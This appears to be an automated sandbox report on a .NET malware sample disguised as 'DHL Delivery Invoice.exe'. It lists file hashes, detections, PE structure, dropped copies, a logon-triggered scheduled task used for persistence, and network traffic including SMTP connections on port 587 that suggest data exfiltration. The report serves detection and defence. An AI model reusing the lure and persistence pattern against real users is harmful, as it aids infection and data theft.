                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r33wqbcv.5wn.psm1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                C:\Users\user\AppData\Local\Temp\tmpC314.tmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\DHL Delivery Invoice.exe
                                                                                                                                File Type:XML 1.0 document, ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1574
                                                                                                                                Entropy (8bit):5.1145737739774875
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtafHxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTYRv
                                                                                                                                MD5:98D336C96FE40FD34BACA1842B429BB9
                                                                                                                                SHA1:FB7BA442BC73A7A24C2ED56D20AEFB5950BE1D04
                                                                                                                                SHA-256:D4F31E20B646DC589867AE016E5F89CC2EC56CD5240728FCEB25AF0B1D3B3C34
                                                                                                                                SHA-512:4449511FBB1E66F0646807D2626D966BB3AE134CB70AA982327D5917A9312D9FEA733C13CD1CC5C0642A790875DA87D1257CC16841FB686786A2B7A081854FE7
                                                                                                                                Malicious:true
                                                                                                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                                                                                C:\Users\user\AppData\Local\Temp\tmpD6AC.tmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\AppData\Roaming\LIWBHGsz.exe
                                                                                                                                File Type:XML 1.0 document, ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1574
                                                                                                                                Entropy (8bit):5.1145737739774875
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtafHxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTYRv
                                                                                                                                MD5:98D336C96FE40FD34BACA1842B429BB9
                                                                                                                                SHA1:FB7BA442BC73A7A24C2ED56D20AEFB5950BE1D04
                                                                                                                                SHA-256:D4F31E20B646DC589867AE016E5F89CC2EC56CD5240728FCEB25AF0B1D3B3C34
                                                                                                                                SHA-512:4449511FBB1E66F0646807D2626D966BB3AE134CB70AA982327D5917A9312D9FEA733C13CD1CC5C0642A790875DA87D1257CC16841FB686786A2B7A081854FE7
                                                                                                                                Malicious:false
                                                                                                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                                                                                C:\Users\user\AppData\Roaming\LIWBHGsz.exe

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\DHL Delivery Invoice.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1000448
                                                                                                                                Entropy (8bit):7.465213437585276
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24576:YCokCSN9N5mSXYodhsVQ2FGnTM8NUFBl6TP:Bokn5mSXbhmQ2FGTM8q6TP
                                                                                                                                MD5:9AF85D4623CAFA79192F542727A6E923
                                                                                                                                SHA1:3739DBEEEC123626E43210A4DAF52D07B2A4247E
                                                                                                                                SHA-256:320BF0A79235FDBFD5D1ADADCFC530E134D9CF3AA67BFB5C63DFDDBC3BB3963F
                                                                                                                                SHA-512:AC7022AAA01FB838F8E61FADFF6BFCD1071812AA9048ED9FBC176A4E45C589C0095B976CF8255643D7F8C8483EBBB70ED6B72BCEAA4E4333CD3D5399EBCD1C14
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                • Antivirus: ReversingLabs, Detection: 53%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....bFg..............0..*...........H... ...`....@.. ....................................@.................................lH..O....`.. ............................................................................ ............... ..H............text....(... ...*.................. ..`.rsrc... ....`.......,..............@..@.reloc...............B..............@..B.................H......H.......................U...g..........................................N.'=d.1o..*)..+....DH....."Y....v...=o.\.1.SL..g .N{{j.0....h...9a).O......+........m.-...E...7}..7....*.N~.C.Z~..ES"X...l.;\.zPv......9S.n..3......lm.ln..L...8,X.gD....X...%.Hfu.m.@...^....z(.o........V.....&..RV*.....|)V{....A..4s.M...t....7$o(#..s.../t,...Ku?g..N|5.....)...n.....OC.....3...$..]$......Y.N..u..5.>..5d[..SkOQ._{t.nIU|.*..P..?..U............o...~+....fx.h*.M...J.]...(

                                                                                                                                C:\Users\user\AppData\Roaming\LIWBHGsz.exe:Zone.Identifier

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\DHL Delivery Invoice.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):26
                                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                Malicious:true
                                                                                                                                Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                Static File Info

                                                                                                                                General

                                                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Entropy (8bit):7.465213437585276
                                                                                                                                TrID:
                                                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                File name:DHL Delivery Invoice.exe
                                                                                                                                File size:1'000'448 bytes
                                                                                                                                MD5:9af85d4623cafa79192f542727a6e923
                                                                                                                                SHA1:3739dbeeec123626e43210a4daf52d07b2a4247e
                                                                                                                                SHA256:320bf0a79235fdbfd5d1adadcfc530e134d9cf3aa67bfb5c63dfddbc3bb3963f
                                                                                                                                SHA512:ac7022aaa01fb838f8e61fadff6bfcd1071812aa9048ed9fbc176a4e45c589c0095b976cf8255643d7f8c8483ebbb70ed6b72bceaa4e4333cd3d5399ebcd1c14
                                                                                                                                SSDEEP:24576:YCokCSN9N5mSXYodhsVQ2FGnTM8NUFBl6TP:Bokn5mSXbhmQ2FGTM8q6TP
                                                                                                                                TLSH:95258C983210B19FC857C9728964DD74E6606CAA930BD303A1E759EFFD0E59BDE140F2
                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....bFg..............0..*...........H... ...`....@.. ....................................@................................

                                                                                                                                File Icon

                                                                                                                                Icon Hash:53084c444c441845

                                                                                                                                Static PE Info

                                                                                                                                General

                                                                                                                                Entrypoint:0x4f48be
                                                                                                                                Entrypoint Section:.text
                                                                                                                                Digitally signed:false
                                                                                                                                Imagebase:0x400000
                                                                                                                                Subsystem:windows gui
                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                Time Stamp:0x674662C8 [Wed Nov 27 00:07:36 2024 UTC]
                                                                                                                                TLS Callbacks:
                                                                                                                                CLR (.Net) Version:
                                                                                                                                OS Version Major:4
                                                                                                                                OS Version Minor:0
                                                                                                                                File Version Major:4
                                                                                                                                File Version Minor:0
                                                                                                                                Subsystem Version Major:4
                                                                                                                                Subsystem Version Minor:0
                                                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                Entrypoint Preview

                                                                                                                                Instruction
                                                                                                                                jmp dword ptr [00402000h]
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al

                                                                                                                                Data Directories

                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xf486c0x4f.text
                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xf60000x1520.rsrc
                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xf80000xc.reloc
                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                Sections

                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                .text0x20000xf28c40xf2a00b469a44186b250cddaacb7fb878a9a35False0.7769191138588356data7.469334701221808IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                .rsrc0xf60000x15200x16004e4553b043c291adb7ae5eea1900bac8False0.7562144886363636data6.977709123114407IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                .reloc0xf80000xc0x2004f0228de4f34f502e364ae9eba53014bFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                Resources

                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                RT_ICON0xf61300xfbePNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.892803970223325
                                                                                                                                RT_GROUP_ICON0xf70f00x14data1.05
                                                                                                                                RT_VERSION0xf71040x22cdata0.49640287769784175
                                                                                                                                RT_MANIFEST0xf73300x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                                Imports

                                                                                                                                DLLImport
                                                                                                                                mscoree.dll_CorExeMain

                                                                                                                                Network Behavior

                                                                                                                                Network Port Distribution

                                                                                                                                TCP Packets

                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Nov 27, 2024 19:15:14.970927954 CET49733443192.168.2.4104.26.12.205
                                                                                                                                Nov 27, 2024 19:15:14.970972061 CET44349733104.26.12.205192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:14.971153975 CET49733443192.168.2.4104.26.12.205
                                                                                                                                Nov 27, 2024 19:15:14.982647896 CET49733443192.168.2.4104.26.12.205
                                                                                                                                Nov 27, 2024 19:15:14.982670069 CET44349733104.26.12.205192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:16.274735928 CET44349733104.26.12.205192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:16.274846077 CET49733443192.168.2.4104.26.12.205
                                                                                                                                Nov 27, 2024 19:15:16.279301882 CET49733443192.168.2.4104.26.12.205
                                                                                                                                Nov 27, 2024 19:15:16.279321909 CET44349733104.26.12.205192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:16.279638052 CET44349733104.26.12.205192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:16.374494076 CET49733443192.168.2.4104.26.12.205
                                                                                                                                Nov 27, 2024 19:15:16.443440914 CET49733443192.168.2.4104.26.12.205
                                                                                                                                Nov 27, 2024 19:15:16.491327047 CET44349733104.26.12.205192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:16.785274029 CET44349733104.26.12.205192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:16.785341978 CET44349733104.26.12.205192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:16.785415888 CET49733443192.168.2.4104.26.12.205
                                                                                                                                Nov 27, 2024 19:15:16.791815996 CET49733443192.168.2.4104.26.12.205
                                                                                                                                Nov 27, 2024 19:15:18.311512947 CET49735587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:18.432379961 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:18.432545900 CET49735587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:19.478491068 CET49737443192.168.2.4104.26.12.205
                                                                                                                                Nov 27, 2024 19:15:19.478549957 CET44349737104.26.12.205192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:19.478655100 CET49737443192.168.2.4104.26.12.205
                                                                                                                                Nov 27, 2024 19:15:19.503742933 CET49737443192.168.2.4104.26.12.205
                                                                                                                                Nov 27, 2024 19:15:19.503771067 CET44349737104.26.12.205192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:19.784538984 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:19.788817883 CET49735587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:19.908952951 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:20.241609097 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:20.241791964 CET49735587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:20.367666006 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:20.700320005 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:20.700835943 CET49735587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:20.768886089 CET44349737104.26.12.205192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:20.768968105 CET49737443192.168.2.4104.26.12.205
                                                                                                                                Nov 27, 2024 19:15:20.771281004 CET49737443192.168.2.4104.26.12.205
                                                                                                                                Nov 27, 2024 19:15:20.771295071 CET44349737104.26.12.205192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:20.771647930 CET44349737104.26.12.205192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:20.886841059 CET49737443192.168.2.4104.26.12.205
                                                                                                                                Nov 27, 2024 19:15:20.929698944 CET49737443192.168.2.4104.26.12.205
                                                                                                                                Nov 27, 2024 19:15:20.960513115 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:20.971335888 CET44349737104.26.12.205192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:21.294713020 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:21.294845104 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:21.294857025 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:21.294910908 CET49735587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:21.295288086 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:21.295352936 CET49735587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:21.298644066 CET44349737104.26.12.205192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:21.298728943 CET44349737104.26.12.205192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:21.298866987 CET49737443192.168.2.4104.26.12.205
                                                                                                                                Nov 27, 2024 19:15:21.299024105 CET49735587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:21.301547050 CET49737443192.168.2.4104.26.12.205
                                                                                                                                Nov 27, 2024 19:15:21.452250957 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:21.784466982 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:21.788042068 CET49735587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:21.856200933 CET49738587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:21.913338900 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:21.987261057 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:21.987473965 CET49738587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:22.245820999 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:22.246975899 CET49735587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:22.378475904 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:22.709844112 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:22.710127115 CET49735587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:22.843816042 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:23.332796097 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:23.333081007 CET49735587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:23.454730988 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:23.552289963 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:23.554558992 CET49738587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:23.699120045 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:23.803169966 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:23.803405046 CET49735587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:23.928072929 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:24.041109085 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:24.041301966 CET49738587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:24.303024054 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:24.370984077 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:24.371203899 CET49735587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:24.514043093 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:24.642561913 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:24.646672010 CET49738587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:24.797621965 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:24.846036911 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:24.848651886 CET49735587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:24.848712921 CET49735587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:24.848731041 CET49735587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:24.848747969 CET49735587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:24.974776983 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:24.974814892 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:24.974823952 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:24.974836111 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:25.138978958 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:25.139090061 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:25.139105082 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:25.139167070 CET49738587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:25.139583111 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:25.140017986 CET49738587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:25.141544104 CET49738587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:25.283777952 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:25.623629093 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:25.637624979 CET49738587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:25.926453114 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:26.024213076 CET5874973577.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:26.074389935 CET49735587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:26.108777046 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:26.109174013 CET49738587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:26.305171013 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:26.647727013 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:26.648104906 CET49738587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:26.821324110 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:27.198755026 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:27.199034929 CET49738587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:27.353480101 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:27.713582039 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:27.713826895 CET49738587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:15:27.834794044 CET5874973877.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:28.275034904 CET5874973877.88.21.158192.168.2.4
